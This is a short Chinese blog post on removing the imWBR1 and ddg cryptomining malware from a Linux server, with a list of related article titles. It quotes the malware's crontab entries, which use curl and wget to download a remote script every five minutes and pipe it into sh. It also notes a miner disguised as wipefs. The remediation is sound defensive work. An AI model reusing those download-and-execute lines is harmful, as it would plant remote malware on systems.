解决挖矿程序(imWBR1,ddg)步骤
Linux 命令
估计这两个是定时下载病毒程序的任务
# cat /var/spool/cron/crontabs/root
*/5 * * * * curl -fsSL http://218.248.40.228:8443/i.sh | sh
*/5 * * * * wget -q -O- http://218.248.40.228:8443/i.sh | sh
# rm -fr /var/spool/cron/
# ps -aux|grep ddg
root 1565 0.0 0.3 198580 5832 ? Sl Mar27 0:48 /tmp/ddg.3001
root 31956 0.0 0.0 112660 976 pts/2 S+ 09:40 0:00 grep --color=auto ddg
# kill -9 1565
ps -aux|grep imWBR1
root 31697 0.4 1.3 319948 25936 ? Ssl 09:15 0:07 /tmp/imWBR1
root 31970 0.0 0.0 112660 976 pts/2 S+ 09:41 0:00 grep --color=auto imWBR1
# kill -9 31697
# cd /tmp
# rm -rf imWBR1
# cat /etc/crontab
看到这个wipefs的定时任务,wipefs本来是正常的,但是top看wipefs占cpu很大,所以是挖坑伪装的
0 */6 * * * root /bin/wipefs
# echo "" > /etc/crontab
解决挖矿程序(imWBR1,ddg)步骤相关推荐
- 阿里云Centos 解决挖矿程序:kdevtmpfsi--服务器CPU占用高、内存占用高
前言 互联网存在很多的漏洞,如果我们使用不当,就会别被别人利用或者是盗取信息.之前在阿里云买的服务器,自己配置了nginx,mysql,redis等服务.由于在某些时候,本地程序开发中需要使用这些服务 ...
- 挖矿程序的处理方式及步骤
概述 随着币圈市场交易的活跃,币价也被日益推高. 从BTC兑美元的在线交易平台上可以看出,BTC的价格屡创新高,这与MG的2W亿脱不了干系. "重赏之下,必有勇夫",在互联网圈里也 ...
- 阿里云服务器被挖矿程序minerd入侵的终极解决办法[转载]
突然发现阿里云服务器CPU很高,几乎达到100%,执行 top c 一看,吓一跳,结果如下: 3798 root 20 0 386m 7852 1272 S 300.0 0.1 4355:11 /tm ...
- 记一次服务器被挖矿程序占用的解决过程
公司有台做voip的服务器最近CPU总是跑满,这机器自从交给厂家搭好环境后基本就没怎么管它,于是进去查看进程,top了下(见下图) 这个叫wnTKYg的进程很诡异,已经把CPU吃光了,上网一查,原来是 ...
- centos6.8服务器中了挖矿程序病毒的解决方法
阿里云提示我的centos服务器出现紧急安全事件:挖矿程序:同时也出现服务器异常登录事件. 出现这样的情况,需要根据以下的步骤去处理 第一步:修改登录的帐号密码,输入命令passwd,根据提未修改. ...
- 解决CentOS被wbew挖矿程序入侵的方法
来龙去脉 昨天收到阿里云的安全邮件,主机被挖矿程序入侵 有必要了解一下挖矿,百度搜索结果 所谓"挖矿"实质上是用计算机解决一项复杂的数学问题,来保证比特币网络分布式记账系统的一致性 ...
- 阿里云服务器被挖矿程序minerd入侵的终极解决办法
突然发现阿里云服务器CPU很高,几乎达到100%,执行 top c 一看,吓一跳,结果如下: 3798 root 20 0 386m 7852 1272 S 300.0 0.1 4355:11 /tm ...
- 记一次阿里云服务器CPU长期100%发现被被种挖矿程序解决的过程(一摸一样,只是没查到怎么进来的,入侵)
centos 7 记一次阿里云服务器被被种挖矿程序解决的过程 1.原因 偶尔发现我的服务器CPU使用率长期处于100%,就登上服务器看了一下 2.查看进程 1 [root@izwz94xp1kwkca ...
- 阿里云服务器挖矿程序解决流程
阿里云服务器挖矿程序解决流程 问题表象 定位解决问题 问题表象 1.CPU满负载 进入root用户执行top命令: 2. 应用进程被杀 ./startWebLogic.sh: line 184: 23 ...
- 【解决阿里云服务器提示挖矿程序风险2022】
解决阿里云服务器提示挖矿程序风险2022-10 搜索删除含system-private相关的所有文件 如图:system-private.... 2.清除定时任务 3.修改文件可执行权限 4.清除路由 ...
最新文章
- 纸质图书与电子图书的营销策略研究
- Spring Security构建Rest服务-0100-前言
- 修改某个用户名和密码
- 硬盘安装以及磁盘分区和检测(笔记本R7000)
- python自带ide和pycharm哪个好_排名前三的Python IDE你选择哪个?我选PyCharm
- 2020 年最厉害的 10 门编程语言
- OPC DA通讯 KEP6.4 DCOM 配置脚本
- python unescape函数_Python中的Unescape字符串
- 8Python全栈之路系列之Django Cookie 与Sessi
- Cannot attach the file as database 'membership'.
- 大数据可视化类型有哪些
- 2021-08-08 mysql索引
- Java实现分页的几种方式
- 吃鸡游戏计算机配置,手游吃鸡pc端吃什么配置
- PowerApps中应用如何显示用户详细信息
- 2207.16吃货联盟设计大纲和全部代码
- Python编程实例03——对英文文本进行分词
- Android十大开源框架
- 【转】Vmware 8.0注册码 序列号 key 注册方法
- 拼多多电子面单云打印接口对接 (跨境erp应用,电子面单应用)[拼多多获取电子面单,拼多多面单打印]